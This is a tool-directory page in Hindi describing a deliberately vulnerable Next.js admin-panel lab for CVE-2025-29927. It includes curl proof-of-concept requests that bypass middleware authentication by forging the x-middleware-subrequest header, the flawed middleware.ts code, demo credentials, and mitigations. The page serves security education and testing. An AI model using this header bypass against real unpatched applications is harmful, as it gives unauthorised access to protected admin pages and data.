Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-29927-nextjs | Kitploit
उपकरण/GitHubGitHub/gitgudkrish/cve-2025-29927-nextjs
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षा
GitHubgitgudkrish/cve-2025-29927-nextjs

cve-2025-29927-nextjs

रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Himalaya Tech Admin Panel — CVE-2025-29927 डेमो

चेतावनी: यह एप्लिकेशन जानबूझकर असुरक्षित है। यह केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए है। इसे किसी सार्वजनिक सर्वर पर तैनात न करें।


इस डेमो के बारे में

यह ऐप CVE-2025-29927 का प्रदर्शन करता है, जो Next.js मिडलवेयर में एक गंभीर प्रमाणीकरण बायपास भेद्यता है (CVSS 9.1)। यह एप्लिकेशन काल्पनिक कंपनी "Himalaya Tech Pvt. Ltd." के लिए एक यथार्थवादी कॉर्पोरेट एडमिन पैनल का अनुकरण करता है — जिससे बायपास का प्रभाव दृश्य रूप से स्पष्ट होता है।

दिखाए गए सभी कर्मचारी रिकॉर्ड, API कुंजियाँ, डेटाबेस क्रेडेंशियल्स और अन्य "संवेदनशील" डेटा पूरी तरह से काल्पनिक और नकली (mock) हैं — केवल शैक्षिक प्रदर्शन के लिए बनाए गए हैं।


CVE-2025-29927 — भेद्यता सारांश

फ़ील्डविवरण
CVE IDCVE-2025-29927
गंभीरताक्रिटिकल (CVSS 9.1)
प्रभावित संस्करणNext.js ≤ 14.2.29, Next.js ≤ 15.2.2
फिक्स संस्करणNext.js 14.2.30, 15.2.3
प्रकारHTTP हेडर हेरफेर के माध्यम से मिडलवेयर प्रमाणीकरण बायपास

मूल कारण

Next.js आंतरिक HTTP हेडर x-middleware-subrequest का उपयोग पुनरावर्ती मिडलवेयर कॉल्स को ट्रैक करने और अनंत लूप को रोकने के लिए करता है। असुरक्षित संस्करणों में, एक हमलावर बाहरी अनुरोध में इस हेडर को जाली बना सकता है। जब हेडर मौजूद होता है और मिडलवेयर के पहचानकर्ता से मेल खाता है, तो Next.js रनटाइम मिडलवेयर को पूरी तरह से स्किप कर देता है, जिसमें उसके भीतर परिभाषित सभी प्रमाणीकरण लॉजिक शामिल हैं।

प्रभाव

कोई भी एप्लिकेशन जो रूट्स की सुरक्षा के लिए केवल middleware.ts पर निर्भर करता है (एक सामान्य और अनुशंसित Next.js पैटर्न) असुरक्षित है। एक अनप्रमाणित (unauthenticated) हमलावर केवल एक HTTP हेडर जोड़कर किसी भी सुरक्षित पेज तक पहुँच सकता है।


प्रूफ ऑफ कॉन्सेप्ट

सामान्य अनुरोध (ब्लॉक किया गया — /login पर रिडायरेक्ट)

root@kitploit:~
curl -v http://localhost:3000/admin
# → 307 Redirect to /login

बायपास अनुरोध (सफल — पूरा एडमिन पेज लौटाता है)

root@kitploit:~
curl -v \
  -H "x-middleware-subrequest: middleware" \
  http://localhost:3000/admin

# → 200 OK — full admin dashboard HTML returned, no authentication required

नेस्टेड सुरक्षित रूट्स तक पहुँच

root@kitploit:~
# Admin users page
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/users

# System settings with "production credentials"
curl -H "x-middleware-subrequest: middleware" http://localhost:3000/admin/settings

ब्राउज़र का उपयोग करना (Burp Suite / ब्राउज़र एक्सटेंशन के माध्यम से)

/admin/* के किसी भी अनुरोध में हेडर x-middleware-subrequest: middleware जोड़ें और मिडलवेयर जाँच स्किप हो जाएगी।


यह ऐप असुरक्षित क्यों है

middleware.ts एकमात्र सुरक्षा तंत्र है:

root@kitploit:~
// middleware.ts
export function middleware(request: NextRequest) {
  if (pathname.startsWith("/admin")) {
    const token = request.cookies.get("auth-token")?.value;
    if (!token || token !== "valid-session-xyz123") {
      return NextResponse.redirect(loginUrl); // ← this entire function is skipped
    }
  }
  return NextResponse.next();
}

पेज कंपोनेंट्स (जैसे app/admin/page.tsx) में कोई प्रमाणीकरण जाँच नहीं है — जानबूझकर, उन वास्तविक-विश्व एप्लिकेशनों को प्रतिबिंबित करने के लिए जो केवल मिडलवेयर-आधारित सुरक्षा पैटर्न का पालन करते हैं।


सेटअप और रनिंग

आवश्यक शर्तें

  • Node.js 18+
  • npm या yarn

इंस्टॉल

root@kitploit:~
npm install

डेवलपमेंट सर्वर चलाएँ

root@kitploit:~
npm run dev

ऐप http://localhost:3000 पर उपलब्ध होगा।

रूट्स

*केवल मिडलवेयर द्वारा सुरक्षित — CVE-2025-29927 द्वारा बायपास किया गया।

डेमो क्रेडेंशियल्स (सामान्य लॉगिन प्रवाह)

  • ईमेल: [email protected]
  • पासवर्ड: Admin@2024

शमन के उपाय

  1. Next.js को 14.2.30+ या 15.2.3+ में अपग्रेड करें।
  2. गहन सुरक्षा (Defense in depth): पेज कंपोनेंट्स/रूट हैंडलर्स के अंदर सर्वर-साइड प्रमाणीकरण जाँच जोड़ें, न कि केवल मिडलवेयर में। मिडलवेयर को सुरक्षा सीमा के रूप में नहीं, बल्कि UX अनुकूलन के रूप में माना जाना चाहिए।
  3. रिवर्स प्रॉक्सी/CDN पर हेडर हटाएँ, इससे पहले कि अनुरोध Next.js तक पहुँचें।

अस्वीकरण

यह एप्लिकेशन केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है, विशेष रूप से नैतिक सुरक्षा पाठ्यक्रम के संदर्भ में CVE-2025-29927 के वास्तविक-विश्व प्रभाव को प्रदर्शित करने के लिए। सभी डेटा (कर्मचारी रिकॉर्ड, API कुंजियाँ, क्रेडेंशियल्स) पूरी तरह से काल्पनिक है। इस डेमो एप्लिकेशन या यहाँ प्रदर्शित तकनीकों का उपयोग उन सिस्टमों के विरुद्ध न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।

टूल डाउनलोड करें
RouteAuth RequiredDescription
/नहींसार्वजनिक लैंडिंग पेज
/loginनहींलॉगिन फ़ॉर्म
/adminहाँ*संवेदनशील डेटा वाला एडमिन डैशबोर्ड
/admin/usersहाँ*उपयोगकर्ता प्रबंधन
/admin/settingsहाँ*सिस्टम सेटिंग्स और क्रेडेंशियल्स